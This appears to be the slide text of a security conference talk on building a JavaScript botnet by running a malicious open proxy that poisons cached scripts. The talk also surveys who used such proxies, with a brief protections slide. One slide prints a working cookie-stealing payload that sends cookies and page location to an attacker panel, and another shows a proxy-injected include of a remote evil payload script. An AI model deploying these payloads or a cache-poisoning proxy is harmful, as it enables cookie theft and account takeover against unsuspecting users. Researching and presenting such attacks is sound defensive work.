This document discusses creating a JavaScript botnet by intercepting web traffic through man-in-the-middle attacks and injecting malicious JavaScript code. It describes using a compromised proxy server and Squid configuration to inject code into responses that steals cookies and form fields. While the document notes some botnets are used by scammers and criminals, it primarily serves to outline the technical approach rather than endorse illegal activity.

1. Owning "bad" guys
{and mafia} with
Javascript botnets
Chema Alonso & Manu “The Sur”

2. Let´s do a botnet but…
• We are lazy
• We haven´t money
• We haven´t 0day
• We aren´t the FBI
• We aren´t either:
• Google
• Apple
• Microsoft

3. Let them to
be infected

4. Man in the Middle schemas
• Intercept communications between client and server
• Compromised channel -> Pwned!
• Network
• ARP Spoofing
• Rogue DHCP(6)
• ICMPv6 Sppofing
• SLAAC Attacks
• DNS Spoofing
• …
• Evil FOCA Rulez!

5. Man in the Browser
• Plugins
• BHO
• Addons
• Access to all data
• Passwords
• Code
• Banking trojans
• “A russian in my IE”

6. JavaScript in the Middle
• Poisoning Browser cache
• No permanent
• Deleting cache means infection cleaned
• Cached content is used if not expired
• Allows attackers to inject remote javascript
• Access to:
• Cookies
• Not HTTPOnly (more or less)
• HTML Code
• Form fields
• URLs
• Code execution
• …

7. Google Analytics js & malware

8. How to inject JavaScript code
• Persistent XSS
• Owning HTTP Servers
• Network Man In the middle attacks
• WiFi
• ARP Spoofing
• IPv6
• Memcache attacks
• Imagination

9. - Framework to own bowser’s cache
- Inject a javascript in each client
- That javaScript loads payloads from C&C
- http://beefproject.com
- Very Well-Known

10. How to create a
JavaScript Botnet
from the scratch

11. TOR Nodes

12. TOR Nodes

13. Not a Rocket Scince….

14. Buy a bullet-Prof
• Not:
• The Pirate Bay
• Amazon
• (Remenber Wikileaks)
• Megaupload

15. Configure SQUID Proxy
GET / HTTP/1.1
Host: www.web.com
GET / HTTP/1.1
Host: www.web.com
Response
Home.html
Response
Home.html
GET /a.jsp HTTP/1.1
Host: www.web.com
GET /a.jsp HTTP/1.1
Host: www.web.com
Response
a.jsp
Response
a.Jsp + pasarela.js
include http://evil/payload.js
GET /payload.js HTTP/1.1
Host: evil

16. Configure SQUID Proxy
Squid.conf: Activate URL rewrite program
.htaccess: Apache No Expiration Policy

17. Infect all JavaScript files

18. Infect all JavaScript files

19. Publish your Proxy

20. Let Internet do the magic

21. Do Payloads: Cookie stealing
document.write(“
<img id='domaingrabber' src='http://X.X.X.X/panel/
domaingrabber.php?id=0.0.0.0&
domain="+document.domain+"&
location="+document.location+"&
cookie="+document.cookie+"' style='display:none;'/>");

22. Do Payloads: Form fields stealing

23. Enjoy

24. Who ·”$”·$ is using
this kind of services?

25. Mafias: Help the Prince

26. Mafias: Nigerian Scammers

27. Mafias: Nigerian Scammers

28. Mafias: Nigerian Scammers

29. Mafias: Nigerian Scammers

30. Mafias: Nigerian Scammers

31. Mafias: Predators

32. Mafias: Predators

33. Mafias: Predators

34. Mafias: Predators

35. Mafias: Predators

36. Mafias: Predators

37. Mafias: Predators

38. Dog Scammers

39. Warning! This
picture could hurt
your emotions…

40. Dog Scammers

41. Psychotics

42. Annonymous

43. Annonymous

44. Rare people in a rare World

45. Hax0rs and defacers….

46. …hacking…

47. … and hacked

48. Intranets

49. And, of course, Pr0n

50. Pr0n

51. Do Payloads: Infect webs for
the future

52. Targeting Attacks
• Select the Target
• Bank
• Social Network
• Intranet
• Analyze loaded files
• Payload:
• Inject and load a infected file for that target, in
every web the victim visits.
• Profit.

53. Demo Facebook

54. Protections
• Take care of mitm
schemas
• Proxy
• TOR networks
• After using them, clean
all
• Cache is not your friend
on the Internet
• VPNs is not a silver bullet

55. Questions?
chema@informatica64.com
mfernandez@informatica64.com